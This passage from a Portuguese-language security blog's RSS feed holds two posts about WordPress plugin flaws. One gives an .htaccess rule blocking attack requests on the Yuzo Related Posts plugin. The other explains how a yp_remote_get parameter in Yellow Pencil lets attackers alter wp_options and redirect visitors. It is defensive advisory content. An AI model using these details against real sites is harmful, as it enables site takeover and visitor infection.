<h3><img loading="lazy" decoding="async" class="alignnone size-medium wp-image-90" src="https://www.ethsecurity.com.br/wp-content/uploads/2019/04/frances-police-moves-to-ubuntu-linux-from-windows3645899823691514234-300x225.png" alt="" width="300" height="225" srcset="https://ethsecurity.com.br/wp-content/uploads/2019/04/frances-police-moves-to-ubuntu-linux-from-windows3645899823691514234-300x225.png 300w, https://ethsecurity.com.br/wp-content/uploads/2019/04/frances-police-moves-to-ubuntu-linux-from-windows3645899823691514234-768x576.png 768w, https://ethsecurity.com.br/wp-content/uploads/2019/04/frances-police-moves-to-ubuntu-linux-from-windows3645899823691514234-700x525.png 700w, https://ethsecurity.com.br/wp-content/uploads/2019/04/frances-police-moves-to-ubuntu-linux-from-windows3645899823691514234.png 770w" sizes="auto, (max-width: 300px) 100vw, 300px" /></h3>
<p>Ainda não foi publicada uma atualização para o problema, então a recomendação é de que o plugin seja totalmente removido de sua instalação até que o desenvolvedor publique uma correção:</p>
<p>https://wordpress.org/support/topic/remove-this-plugin-immediately/</p>
<p>Como dito no vídeo criei um htaccess para que você possa se proteger dessa falha caso deseje manter o plugin, porém essa medida serve somente para esse tipo de ataque, pois o invasor pode alterar o modo como realiza a requisição, porém já é o bastante para bloquear o processo automático que ocorre nesse momento na internet:</p>
<p>&nbsp;</p>
<p>RewriteEngine on<br />
ErrorDocument 406 &#8220;&lt;head&gt;&lt;title&gt;Bad Request!&lt;/title&gt;&lt;/head&gt;&lt;body&gt;&lt;h1&gt;Blocked by Defensor Web!&lt;/h1&gt;&lt;p&gt;Hacking Attempt!. &lt;/p&gt;&lt;/body&gt;&lt;/html&gt;&#8221;<br />
RewriteEngine On<br />
RewriteCond %{THE_REQUEST} &#8220;POST \/wp-admin\/admin-post\.php\?page\=yuzo-related-post HTTP\/1.1&#8221; [NC]<br />
RewriteRule .* – [R=406,L]</p>
<p>&nbsp;</p>
<p>As aspas podem colar incorretamente em seu htaccess, então disponibilizei o código raw no pastebin:</p>
<p><a href="https://pastebin.com/GKYBv5Qt">https://pastebin.com/GKYBv5Qt</a></p>
<p>&nbsp;</p>
<p>Dúvidas e sugestões fiquem a vontade para se expressarem nos comentários.</p>
<h1>Site infectado? Não consegue resolver?</h1>
<p>Entre em contato agora com nossa consultoria especializada através do link <a href="https://www.ethsecurity.com.br/remocao-de-malwares/">Remoção de Malware</a> em nosso site.</p>
<p><!-- LOMADEE - BEGIN --><br />
<script src="//ad.lomadee.com/banners/script.js?sourceId=36131687&#038;dimension=9&#038;height=350&#038;width=350&#038;method=0" type="text/javascript" language="javascript"></script><br />
<!-- LOMADEE - END --></p>
<p>O post <a href="https://ethsecurity.com.br/ataques-no-plugin-yuzo-related-posts-remover-a-infeccao/">[Vídeo] Ataques no Plugin Yuzo Related Posts, como remover a infecção</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://ethsecurity.com.br/ataques-no-plugin-yuzo-related-posts-remover-a-infeccao/feed/</wfw:commentRss>
			<slash:comments>2</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">138</post-id>	</item>
		<item>
		<title>Vulnerabilidade sendo explorada no plugin Yellow Pencil do WordPress, atualização já disponível.</title>
		<link>https://ethsecurity.com.br/vulnerabilidade-sendo-explorada-no-plugin-yellow-pencil-do-wordpress/</link>
					<comments>https://ethsecurity.com.br/vulnerabilidade-sendo-explorada-no-plugin-yellow-pencil-do-wordpress/#respond</comments>
		
		<dc:creator><![CDATA[defensorweb]]></dc:creator>
		<pubDate>Sat, 13 Apr 2019 15:02:39 +0000</pubDate>
				<category><![CDATA[Segurança na web]]></category>
		<category><![CDATA[plugin]]></category>
		<category><![CDATA[security]]></category>
		<category><![CDATA[segurança]]></category>
		<category><![CDATA[segurança de sites]]></category>
		<category><![CDATA[segurança web]]></category>
		<category><![CDATA[virus de site]]></category>
		<category><![CDATA[vulnerabilidade yellow pencil]]></category>
		<category><![CDATA[wordpress]]></category>
		<guid isPermaLink="false">https://www.ethsecurity.com.br/?p=106</guid>

					<description><![CDATA[<p>    Foi publicada essa semana uma vulnerabilidade que vem sendo explorada por hackers a fim de infectar sites WordPress que utilizam o plugin Yellow Pencil. Esse plugin é muito utilizado para personalizar o estilo do sites, como cores e formatos das páginas, porém o mesmo foi removido do repositório do WordPress  devido a falha [&#8230;]</p>
<p>O post <a href="https://ethsecurity.com.br/vulnerabilidade-sendo-explorada-no-plugin-yellow-pencil-do-wordpress/">Vulnerabilidade sendo explorada no plugin Yellow Pencil do WordPress, atualização já disponível.</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><!-- LOMADEE - BEGIN --><br />
<script src="//ad.lomadee.com/banners/script.js?sourceId=36131687&#038;dimension=9&#038;height=350&#038;width=350&#038;method=0" type="text/javascript" language="javascript"></script><br />
<!-- LOMADEE - END --></p>
<blockquote>
<p style="text-align: left;">    Foi publicada essa semana uma vulnerabilidade que vem sendo explorada por hackers a fim de infectar sites WordPress que utilizam o plugin Yellow Pencil. Esse plugin é muito utilizado para personalizar o estilo do sites, como cores e formatos das páginas, porém o mesmo foi removido do repositório do WordPress  devido a falha descoberta.</p>
</blockquote>
<p>&nbsp;</p>
<h3>    Escalonamento de privilégio que permite a alteração na tabela wp_options:</h3>
<p>A primeira parte da falha está presente no arquivo yellow-pencil.php, que possui um função que é chamada a cada carregamento de página para verificar se o parâmetro yp_remote_get foi definido, em caso afirmativo o plugin eleva o privilégio para de  um administrador do WordPress  para concluir a solicitação.</p>
<p>&nbsp;</p>
<h3>    Como essa falha vem sendo explorada:</h3>
<p>Como a falha concede acesso para que o conteúdo da tabela wp_options seja alterado, informações sensíveis a segurança estão sendo alteradas, como email do administrador e a URL do site, assim quando o site é acessado o usuário é redirecionado para sites malicioso que tem como objetivo infectar os computadores dos usuários, trazendo assim sérios prejuízos  para a imagem do site na internet e no ranqueamento do Google, o que é um transtorno e tanto para quem deseja ter uma presença online de sucesso.</p>
<p>&nbsp;</p>
<h3>O que fazer caso seu site utilize este plugin:</h3>
<p>Caso você utilize esse plugin há grandes chances de sei site estar infectado, em caso afirmativo você pode utilizar o sitecheck do portal Sucuri para detectar a url maliciosa, porém recomendamos que esse plugin seja removido de sua instalação até que uma atualização de segurança seja disponibilizada.</p>
<p>Caso mesmo assim você precise utilizar esse plugin em seu site e não posso substituí-lo ou removê-lo recomendamos que utilize o firewall do <a href="https://www.wordfence.com/">Wordfence</a> na versão premium, que já possui uma proteção para essa exploração.</p>
<p>&nbsp;</p>
<h3> Update!</h3>
<p>O plugin Yellow Pencil publicou na data de hoje uma atualização para a falha relatada neste post, fizemos os devidos testes com a nova versão conforme o link para atualização:</p>
<p>https://yellowpencil.waspthemes.com/docs/important-security-update/</p>
<p>Com base nos testes a falha foi devidamente fechada, então caso você possua esse plugin em seu WordPress realize o update imediatamente.</p>
<p><!-- LOMADEE - BEGIN --><br />
<script src="//ad.lomadee.com/banners/script.js?sourceId=36131687&#038;dimension=9&#038;height=350&#038;width=350&#038;method=0" type="text/javascript" language="javascript"></script><br />
<!-- LOMADEE - END --></p>
<p>&nbsp;</p>
<p>E aí? o que acharam? fiquem a vontade para se expressar nos comentários, também podem realizar perguntas que nossa equipe terá prazer em respondê-las.</p>
<p>&nbsp;</p>
<h1>Site infectado? Não consegue resolver?</h1>
<p>Entre em contato agora com nossa consultoria especializada através do link <a href="https://www.ethsecurity.com.br/remocao-de-malwares/">Remoção de Malware</a> em nosso site.</p>
<p><!-- LOMADEE - BEGIN --><br />
<script src="//ad.lomadee.com/banners/script.js?sourceId=36131687&#038;dimension=9&#038;height=350&#038;width=350&#038;method=0" type="text/javascript" language="javascript"></script><br />
<!-- LOMADEE - END --></p>
<p>O post <a href="https://ethsecurity.com.br/vulnerabilidade-sendo-explorada-no-plugin-yellow-pencil-do-wordpress/">Vulnerabilidade sendo explorada no plugin Yellow Pencil do WordPress, atualização já disponível.</a> apareceu primeiro em <a href="https://ethsecurity.com.br">ETH SECURITY</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://ethsecurity.com.br/vulnerabilidade-sendo-explorada-no-plugin-yellow-pencil-do-wordpress/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">106</post-id>	</item>
	</channel>
</rss>
